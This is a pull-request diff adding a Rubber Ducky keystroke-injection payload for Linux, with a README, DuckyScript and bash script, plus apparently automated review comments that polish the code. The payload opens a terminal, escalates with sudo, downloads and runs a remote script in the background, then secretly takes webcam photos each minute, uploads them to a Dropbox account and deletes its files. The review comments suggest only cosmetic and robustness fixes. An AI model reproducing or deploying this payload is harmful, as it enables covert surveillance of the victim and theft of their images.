Merge pull request #291 from aleff-github/patch-31

Exfiltrate Photos Through Shell
pull/361/merge
Darren Kitchen 2023-06-09 18:54:27 -05:00 committed by GitHub
commit 65408bdec0
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
3 changed files with 153 additions and 0 deletions


@ -0,0 +1,56 @@
# Exfiltrate Photos Through Shell - Linux ✅
A script used to exfiltrate photos using fswebcam shell command.
**Category**: Exfiltration
## Description
A script used to exfiltrate photos using fswebcam shell command. The permissions is needed for give the executation permission to the script downloaded.
## Getting Started
### Dependencies
* An internet connection
* Linux system
* Dropbox Token, or whatever you want, for the exfiltration
* sudo permission
* 'fswebcam' installed but you can install it with the payload
### Executing program
* Plug in your device
### Settings
* Dropbox Token - You should change it into the script.sh file, line 7.
```Python
TOKEN=your_dropbox_token
```
* This section of sudo time depends by the computer power on which it runs. So if you know that the computer on which you run the payload is too slow, increase it by a few seconds, otherwise you can try running it as it is (so 5000) set now or smaller depending on your needs.
```DuckyScript
STRING SUDO-PSWD
ENTER
REM DELAY Based On Computer Power
DELAY 5000
```
* If you want to install the fswebcam dependency, you should uncomment it. This DELAY (so 5000), like the previous one, is dynamic and in this case relies on the power of the Internet.
```DuckyScript
REM STRING apt install fswebcam -y
REM ENTER
REM DELAY Based On Internet Power
REM DELAY 5000
```
* Generally does not need much time
```DuckyScript
REM DELAY Based On Internet Power
DELAY 4000
```
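Review bot: the fence around `TOKEN=your_dropbox_token` is tagged `Python`, but the line is a bash assignment copied from script.sh; tag it `bash` so it renders and reads correctly. The same bullet tells the user to edit "line 7" of script.sh, while in the script added in this pull request the `TOKEN=` assignment is the fourth line; refer to the variable by name rather than by line number so the README does not drift from the script. The Dependencies list should also say that the commented `apt install fswebcam -y` line only applies to Debian-based distributions, and should document that the script runs for about ten minutes (ten captures with a 60-second sleep), since the README currently gives no idea of how long the payload stays active.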


@ -0,0 +1,65 @@
REM ##################################################
REM # |
REM # Title : Exfiltrate Photos Through Shell |
REM # Author : Aleff |
REM # Version : 1.0 |
REM # Category : Exfiltration |
REM # Target : Linux |
REM # |
REM ##################################################
REM Requirements:
REM - Internet Connection
REM - Dropbox Token for example, but you can use whatever you want for the exfiltration (i.e. smtp e-mail, Discord, Telegram and so on..)
REM - sudo permissions
REM - if you need to install 'fswebcam'
REM - for add the -x permission to the script.sh downloaded
REM REQUIRED - replace example.com with your script.sh link
DEFINE SCRIPT-SH-LINK example.com
REM REQUIRED - sudo Password
DEFINE SUDO-PSWD example
DELAY 1000
CTRL-ALT t
DELAY 2000
REM #### Permission ####
REM This section of sudo time depends by the computer power on which it runs.
REM So if you know that the computer on which you run the payload is too slow, increase it by a few seconds, otherwise you can try running it as it is set now or smaller depending on your needs.
STRING sudo su
ENTER
DELAY 500
STRING SUDO-PSWD
ENTER
REM DELAY Based On Computer Power
DELAY 5000
REM If you want to install the dependency of fswebcam you should decommend it.
REM STRING apt install fswebcam -y
REM ENTER
REM DELAY Based On Internet Power
REM DELAY 5000
REM #### Script ####
STRING curl
STRING SCRIPT-SH-LINK
STRING > script.sh
ENTER
REM DELAY Based On Internet Power
DELAY 4000
STRING chmod +x script.sh
ENTER
DELAY 500
STRING nohup ./script.sh > /dev/null 2>&1 & exit
ENTER
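Review bot: "decommend" in `REM If you want to install the dependency of fswebcam you should decommend it.` should read "uncomment". The header declares `Target : Linux` in general, but `REM STRING apt install fswebcam -y` is specific to Debian-based distributions; state that in the Requirements block. The `DEFINE SUDO-PSWD example` line puts a sudo password in clear text in the payload file, and `DEFINE SCRIPT-SH-LINK example.com` fetches script.sh over a plain `curl` with no integrity check; both deserve a REM line so a reader understands what they are committing to the device.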


@ -0,0 +1,32 @@
#!/bin/bash
USER=$(whoami)
DIR=/home/$USER/tmp
TOKEN=your_dropbox_token
mkdir -p $DIR
function remove_folder {
rm -rf "$DIR"
rm -rf "/home/$USER/script.sh"
}
trap remove_folder EXIT
# execute the for, for some times..
for i in {1..10}
do
NAME=$(date +%s%N).jpg
fswebcam --no-banner $DIR/$NAME
curl -X POST https://content.dropboxapi.com/2/files/upload \
--header "Authorization: Bearer $TOKEN" \
--header "Dropbox-API-Arg: {\"path\": \"/$NAME\",\"mode\": \"add\",\"autorename\": true,\"mute\": false}" \
--header "Content-Type: application/octet-stream" \
--data-binary @$DIR/$NAME
sleep 60
done
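Review bot: `USER=$(whoami)` overwrites the login variable `USER`, which is fragile; `$HOME` already holds the home directory and should be used for `DIR` and the path in `remove_folder`. The loop uploads whatever `fswebcam --no-banner $DIR/$NAME` produced without checking its exit status, so on a machine with no webcam `curl --data-binary @$DIR/$NAME` is run against a file that does not exist; test the exit status before the upload. `$DIR/$NAME` is unquoted in both the `fswebcam` and `curl` lines and should be quoted. The comment `# execute the for, for some times..` should say what the loop actually does (ten captures, one per minute). Finally, `TOKEN=your_dropbox_token` embeds a live Dropbox credential in plain text in a file written to the target's disk; the README should say so, because anyone who recovers script.sh gets write access to that Dropbox account.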